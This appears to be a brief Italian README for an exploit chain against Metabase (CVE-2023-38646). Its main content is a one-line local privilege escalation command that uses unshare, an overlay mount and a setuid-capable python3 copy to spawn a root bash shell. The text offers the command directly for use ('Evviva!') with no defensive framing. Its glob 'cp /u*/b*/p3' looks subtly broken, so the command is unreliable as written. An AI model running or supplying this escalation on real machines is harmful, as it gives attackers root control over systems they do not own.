
Exploit per CVE-2023-38646 in Metabase, che raggiunge l'esecuzione remota di codice e l'escalation dei privilegi a root tramite tecniche unshare e setuid.
Per ottenere l'utente root della macchina o del sistema in base alle informazioni sopra, questo comando e file consentono di accedere all'utente root.
Puoi eseguire questo comando direttamente o eseguirlo come file e lanciarlo. Comando: $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
File eseguito: $./exploitsh.sh
Evviva!